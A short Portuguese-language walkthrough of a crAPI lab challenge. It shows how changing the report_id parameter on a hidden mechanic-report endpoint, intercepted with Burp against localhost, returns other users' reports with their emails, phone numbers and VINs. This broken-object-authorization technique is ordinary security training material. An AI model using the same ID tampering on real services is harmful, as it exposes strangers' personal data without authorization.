Desafio 2 - Acessar relatórios de mecânicos de outros usuários

A crAPI permite que proprietários de veículos entrem em contato com seus mecânicos enviando um formulário de "contato com mecânico". Este desafio consiste em acessar relatórios de mecânicos enviados por outros usuários.

Analisar o processo de envio de relatórios

Encontrar um endpoint oculto da API que exponha detalhes de um relatório de mecânico

Alterar o ID do relatório para acessar outros relatórios



Burp na página de contactar mecanico

GET http://localhost:8888/workshop/api/mechanic/mechanic_report?report_id=10


{
"id": 5,
    "mechanic": {
        "id": 1,
        "mechanic_code": "TRAC_JHN",
        "user": {
            "email": "jhon@example.com",
            "number": ""
        }
    },
    "vehicle": {
        "id": 3,
        "vin": "0NKPZ09IHOP508673",
        "owner": {
            "email": "robot001@example.com",
            "number": "9876570001"
        }
    },
    "problem_details": "My car BMW - 5 Series is having issues.\nCan you give me a call on my mobile 9876570001,\nOr send me an email at robot001@example.com\nThanks,\nRobot.\n",
    "status": "pending",
    "created_on": "01 September, 2025, 20:30:29"
}


{
    "id": 4,
    "mechanic": {
        "id": 1,
        "mechanic_code": "TRAC_JHN",
        "user": {
            "email": "jhon@example.com",
            "number": ""
        }
    },
    "vehicle": {
        "id": 5,
        "vin": "6NBBY70FWUM324316",
        "owner": {
            "email": "admin@example.com",
            "number": "9010203040"
        }
    },
    "problem_details": "My car Audi - RS7 is having issues.\nCan you give me a call on my mobile 9010203040,\nOr send me an email at admin@example.com\nThanks,\nAdmin.\n",
    "status": "finished",
    "created_on": "01 September, 2025, 20:30:29"
}


{
    "id": 2,
    "mechanic": {
        "id": 1,
        "mechanic_code": "TRAC_JHN",
        "user": {
            "email": "jhon@example.com",
            "number": ""
        }
    },
    "vehicle": {
        "id": 2,
        "vin": "8VAUI03PRUQ686911",
        "owner": {
            "email": "pogba006@example.com",
            "number": "9876570006"
        }
    },
    "problem_details": "My car MG Motor - Hector Plus is having issues.\nCan you give me a call on my mobile 9876570006,\nOr send me an email at pogba006@example.com\nThanks,\nPogba.\n",
    "status": "finished",
    "created_on": "01 September, 2025, 20:30:28"
}


{
    "id": 1,
    "mechanic": {
        "id": 1,
        "mechanic_code": "TRAC_JHN",
        "user": {
            "email": "jhon@example.com",
            "number": ""
        }
    },
    "vehicle": {
        "id": 5,
        "vin": "6NBBY70FWUM324316",
        "owner": {
            "email": "admin@example.com",
            "number": "9010203040"
        }
    },
    "problem_details": "My car Audi - RS7 is having issues.\nCan you give me a call on my mobile 9010203040,\nOr send me an email at admin@example.com\nThanks,\nAdmin.\n",
    "status": "pending",
    "created_on": "01 September, 2025, 20:30:28"
}
